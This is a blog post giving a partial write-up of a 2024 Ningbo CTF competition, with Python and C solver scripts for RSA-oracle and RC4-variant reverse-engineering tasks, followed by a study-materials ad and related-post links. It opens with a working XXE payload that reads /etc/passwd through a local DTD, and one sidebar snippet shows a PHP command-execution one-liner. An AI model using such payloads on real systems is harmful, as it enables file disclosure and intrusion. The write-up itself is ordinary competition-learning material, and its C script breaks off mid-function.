2024“天一永安杯“宁波第七届网络安全大赛极安云科战队部分WP(1)

于 2024-05-11 22:17:08 发布
阅读量180 收藏
点赞数 3
分类专栏: 程序员 文章标签: web安全 python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84970268/article/details/138731974
版权 
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE message [
    <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">

    <!ENTITY % expr 'aaa)>
        <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;error;
        <!ELEMENT aa (bb'>

    %local_dtd;
]>

CY1

import websocket
import json
from Crypto.Util.number import \*
from gmpy2 import \*

def get\_flag(ws):
    x = ""
    ws.send(json.dumps({"cmd": "get\_flag"}))
    while x == "" or x == "Pls send msgs and I'll return the result":
        x = ws.recv()
    return x

def f(ws, cmd, data):
    x = ""
    ws.send(json.dumps({"cmd": cmd, "data": data.zfill(512)}))
    while x == "" or x == "Pls send msgs and I'll return the result":
        x = ws.recv()
    return x

uri = "ws://xxx.xxx.xxx.xxx:xxxxx"
ws = websocket.create_connection(uri)
c = int(get_flag(ws), 16)
c2 = int(f(ws, "enc", hex(2)[2:]), 16)
c3 = int(f(ws, "enc", hex(3)[2:]), 16)
c4 = int(f(ws, "enc", hex(4)[2:]), 16)
c9 = int(f(ws, "enc", hex(9)[2:]), 16)
n = GCD(c2\*\*2 - c4, c3\*\*2 - c9)
enc_flag_2 = c2 \* c % n
flag_2 = int(f(ws, "dec", hex(enc_flag_2)[2:]), 16)
print(long_to_bytes(flag_2 // 2))

RE1

key和key1用crypto1算法混淆,再用cry2算法吧加密后的key混淆

def init(s, key1):
    key_length = len(key1)
    for i in range(256):
        s[i] = i
    j = 0
    for i in range(256):
        j = (j + s[i] + key1[i % key_length]) % 256
        s[i], s[j] = s[j], s[i]

def crypt1(s, key):
    v5 = 0
    v6 = 0
    encrypted_key = bytearray(key)
    for i in range(len(key)):
        v5 = (v5 + 1) % 256
        v6 = (v6 + s[v5]) % 256
        s[v5], s[v6] = s[v6], s[v5]
        key_stream_byte = s[(s[v5] + s[v6]) % 256]
        encrypted_key[i] ^= key_stream_byte
    return encrypted_key

def before\_main(key, key1):
    s = list(range(256))
    init(s, key1)
    encrypted_key = crypt1(s, key)
    return encrypted_key
key1 = b"keykey" 
key = b"ban\_debug!" 
encrypted_key = before_main(key, key1)

print("Encrypted key:", encrypted_key)


def init(s, key):
    key_length = len(key)
    for i in range(256):
        s[i] = i
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % key_length]) % 256
        s[i], s[j] = s[j], s[i]

def crypt2(s, data):
    v5 = 0
    v6 = 0
    encrypted_data = bytearray(data)
    for i in range(len(data)):
        v5 = (v5 + 1) % 256
        v6 = (v6 + s[v5]) % 256
        s[v5], s[v6] = s[v6], s[v5]
        key_stream_byte = s[(s[v5] + s[v6]) % 256]
        encrypted_data[i] = (encrypted_data[i] - key_stream_byte) % 256
    return encrypted_data

def decrypt2(s, cipher):
    decrypted_data = bytearray(cipher)
    v5 = 0
    v6 = 0
    for i in range(len(cipher)):
        v5 = (v5 + 1) % 256
        v6 = (v6 + s[v5]) % 256
        s[v5], s[v6] = s[v6], s[v5]
        key_stream_byte = s[(s[v5] + s[v6]) % 256]
        decrypted_data[i] = (decrypted_data[i] + key_stream_byte) % 256
    return decrypted_data
key = b'key'
cipher = bytes([0x4e, 0x47, 0x38, 0x47, 0x62, 0x0a,  0x79, 0x6a, 0x03, 0x66, 0xc0, 0x69, 0x8d, 0x1c, 0x84, 0x0f, 0x54, 0x4a, 0x3b, 0x08, 0xe3, 0x30, 0x4f, 0xb9, 0x6c, 0xab, 0x36, 0x24, 0x52, 0x81, 0xcf])
s = list(range(256))
init(s, key)

decrypted_flag = decrypt2(s, cipher)
print("Decrypted flag:", decrypted_flag.decode())

第一个脚本得到加密flag的key,使用第二个脚本解出flag

RE2

修改UPX特征码后upx -d脱壳,IDA分析,rc4改了轮数

image-20240505131620532

并且key在加密之前修改了

image-20240505131656187

解密脚本

unsigned char sbox[size] = {0};
void init\_sbox(unsigned char \*key)
{
unsigned int i, j, k;
int tmp;
for (i = 0; i < size; i++)
{
sbox[i] = i;
}
j = k = 0;
for (i = 0; i < size; i++)
{
tmp = sbox[i];
j = (j + tmp + key[k]) % size;
sbox[i] = sbox[j];
sbox[j] = tmp;
if (++k >= strlen((char \*)key))
k = 0;
}
}
void encode(unsigned char \*key, unsigned char \*data)
{
int i, j, k, R, tmp;
init\_sbox(key);
j = k = 0;
for (i = 0; i < strlen((char \*)data); i++)
{
j = (j + 1) % size;
k = (k + sbox[j]) % size;
## 最后

**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**

**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**

**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**

![img](https://img-blog.csdnimg.cn/img_convert/e6527c815e3ed333aee30bec51a61619.png)

![img](https://img-blog.csdnimg.cn/img_convert/8b0793b383ad7a1ae03291570a35dec3.png)

![img](https://img-blog.csdnimg.cn/img_convert/510f946107afd61c319b89fc1e37e935.png)

![img](https://img-blog.csdnimg.cn/img_convert/18462e8023ce8be17ac59ea7ea8b4cfb.png)

![img](https://img-blog.csdnimg.cn/img_convert/09bc19dd6bed775b001c9e8fa3cf7b87.png)

 

**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**

[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**

白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**

[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**
2401_84970268
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2022宁波市第五届网络安全大赛(训练赛Misc部分)
weixin_52961098的博客
05-17 4472
Search evidence 在某银行在近的一次项目中,关键数据疑似泄漏。经过某种手段已经把嫌疑锁定在嫌疑人A身上了,但是嫌疑人A的U盘中除了一张图片之外,没有发现任何相关的信息。你能帮助公司找到他泄漏数据的确凿证据吗?Flag格式flag{xxx}. 附件打开 解压密码在注释部分 解压之后用010打开,Flag字符串在右边这一列 FLAG{QohLfitIPtByVxux} Key Evidence 银行近的一次项目中,某个服务器的密钥被泄露,并被经过某种手段已经把嫌疑锁定
2022宁波市第五届网络安全大赛(初赛Misc部分
weixin_52961098的博客
05-17 2008
听说线下决赛有菠萝包吃? 解题情况:5题解4,一个三血,哆哆嗦嗦进决赛 BlackAndWhite 打开附件,发现是黑色和白色照片,猜测代表2进制,一共336张 脚本如下 white = open('D:/Users/huawei/Desktop/target/0.png', 'rb').read() black = open('D:/Users/huawei/Desktop/target/1.png', 'rb').read() ​ flag = '' ​ for i in range.
宁波市第三届网络安全大赛-WriteUp(Misc)
pone2233的博客
07-07 3497
文章目录内心OSMisc | 完成 | 第一Misc | 完成 | BBQMisc | 完成 | 看图说话Misc | 未完成 | 等等我Misc | 未完成 | 抓我把 内心OS 第一次参加这种大型比赛,实力较菜,请师傅们多多指点 Misc | 完成 | 第一 下载文件,看一下doc没有任何问题, 没有发现任何隐写,然后修改文件后缀名docx为zip,解压 将所有解压后的文件打开,用notepad++ 在此全部文件中搜索flag字段,即可找到flag Misc | 完成 | BBQ 庞大的base6
天一永安杯”2024宁波第七届网络安全大赛暨第九届大学生网络技术与信息安全大赛-部分MISC、WEB、RE-WP
weixin_62467741的博客
05-05 689
1.png打开,一眼像素有问题,stegsolve嗦一下,发现只有RGB的第七个通道有数据块并且部分黑,直接过滤7通道,得到一堆hex,hex转码。简单审一下,就是flag字符串和key进行了crypt2处理,继续追踪key,发现key是由key和key1两个变量经过crypt1处理得到。F12被禁了,URL前加view-source:,源码得到flag。2.搜一下发现是日语歌,发现前面有空的字符,连起来就是key的提示。先逆key,追踪key和key1,得到值,写解密脚本。3.直接搜这个解密网站。
2024“天一永安杯“宁波第七届网络安全大赛安云科部分WP
Geek极安云科-致力于网络安全事业
05-05 1183
天一永安杯”2024 宁波第七届网络安全大赛暨第九届大学生网络技术与信息安全大赛大赛竞赛形式一、线上初赛参赛人员:各单位自行选拔3人(设长1名)组成团,不足3人不允许参赛。竞赛时间:8:30-12:00(比赛3个小时,不含签到时间)竞赛模式:CTF解题模式(排名图为赛时截的,最终排名应该是50多,行业组排30多)Geek安云科WriteUp解题情况:Web1、Web2、RE1、RE2、CY1、MISC1。
山东理工大学首届“安云杯”计算机网络与信息安全竞赛内容和规则介绍.pdf
12-20
山东理工大学首届“安云杯”计算机网络与信息安全竞赛内容和规则介绍.pdf
网络安全培训方案(1).docx
06-09
web服务器的banner获取与隐藏 第一节:web服务器banner获取(全部中间件) 实验一:web服务器banner获取 第二节:web服务器banner隐藏(全部中间件) 实验二:web服务器banner隐藏 第二章:目录遍网络安全培训方案(1)...
网络安全培训方案(1).doc
06-09
安云科技针对学生每年举办两次定期培训,现已经举办了4次针对学生的培训,同时,受 邀给青岛工学院、济南职业技术学院、山东警察学院等学校的老师进行培训 关于提升就业问题:现阶段,国家对信息安全的重视及网络...
2023年宁波市网络安全大赛天一永安杯)-训练赛
weixin_52961098的博客
05-16 990
写给新生看的,步骤又乱又多,不喜勿喷,我也不改,爱看不看。
天一永安杯”2023宁波市第六届网络安全大赛 re wp
Todog的博客
05-28 713
这里会看高位是0还是1,0就会触发异常,我们的sum会进行异或。一直f7,循环就跳过。upx壳,被魔改了。so文件比对,base64直接解。发现有花指令,全patch掉。发现是RC4,但是有改动。然后就可以正常f5看了。
2020宁波市第三届网络安全大赛 Web Writeup
qq_33624424的博客
07-07 4011
2020宁波市第三届网络安全大赛,比赛分行业组和院校组进行团体赛。感觉这次比赛还是很不错的~ 值得参加。 Easy_SSRF <?php show_source(__FILE__); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $_GET["url"]); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch,&nbs.
2023宁波市网络安全大赛天一永安部分练习题WP
一位热爱网安的年轻人的博客
05-16 654
宁波市网络安全大赛 天一永安杯练习题wp
2023天一永安部分wp
arcuied
05-22 1409
布尔盲注。
2023宁波市赛 天一永安杯赛前模拟题部分wp
arcuied
05-16 4911
天一永安杯赛前模拟题 wp
天一永安杯” 初赛 2024宁波第七届网络安全大赛暨第九届大学生网络技术与信息安全大赛 题解WP
最新发布
Jay17的博客
05-07 778
天一永安杯” 初赛 2024宁波第七届网络安全大赛暨第九届大学生网络技术与信息安全大赛 题解WP
宁波天一永安杯初赛 wp-AGCTS
akxnxbshai的博客
06-22 987
以前的wp,发一下。
2021宁波市第四届网络安全大赛
Huamang的博客
05-23 1158
简单的php 和nepctf那题litter_thick一样的 找到有一个flag.php 然后写个马进去,cat一下flag.php就可以了 ?1=echo `cat flag.php`; index index.php~有源码 <?php include ("config.php"); $db = mysql_connect($dbhost, $dbuser, $dbpass); mysql_select_db($database, $db) or die("Could not selec
2021宁波市第四届网络安全大赛——预赛
weixin_52805837的博客
05-24 877
Web1: 先7位可控字符下的任意命令执行 exp:#!/usr/bin/python -- coding: UTF-8 -- import requests url = “http://119.61.19.212:50070/exec.php?1={0}” print("[+]start attack!!!") with open(“payload.txt”, “r”) as f: for i in f: print("[*]" + url.format(i.strip())) requests.get(

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值